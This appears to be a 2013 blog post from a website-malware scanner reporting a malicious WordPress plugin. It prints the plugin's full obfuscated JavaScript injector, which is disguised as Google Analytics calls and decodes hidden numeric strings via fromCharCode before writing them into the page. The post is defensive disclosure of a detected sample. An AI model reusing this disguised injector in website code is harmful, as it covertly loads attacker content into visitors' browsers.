Malicious WordPress plugin
Online Website Malware Scanner detected similar malicious JavaScript script in the WordPress plugin. We already encounter similar patterns in other websites.
Submission date: Mon Mar 25 20:30:03 2013
Quttera website scan report snapshot:
The malicious JavaScript with dynamic "fromCharCode"
<script type='text/javascript' language='javascript'>
var _ga7 = [];
_ga7.push(['_setOption', ' 130185186191178171102186191182 1711311041861711901861171']);
_ga7.push(['_setOption', ' 691851851041321161691671851871 6717816517619318218118517']);
_ga7.push(['_trackPageview', ' 518617518118012816716818518117 8187186171129169178175182']);
_ga7.push(['_setPageId', ' 128184171169186110122121122182 1901141671871861811141671']);
_ga7.push(['_setOption', ' 871861811141221211221821901111 2919513011718518619117817']);
_ga7.push(['_setOption', '1132']);
var t = z = '',
l = pos = v = 0,
a1 = "arCo",
a2 = "omCh";
for (v = 0; v < _ga7.length; v++) t += _ga7[v][1];
l = t.length;
while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);
document.write(z);
</script>
Related post
Similar case with malicious Google Analytics plugin discussed here http://quttera.blogspot.co.il/2013/03/malicious-wordpress-plugin-detection.html
No comments:
Post a Comment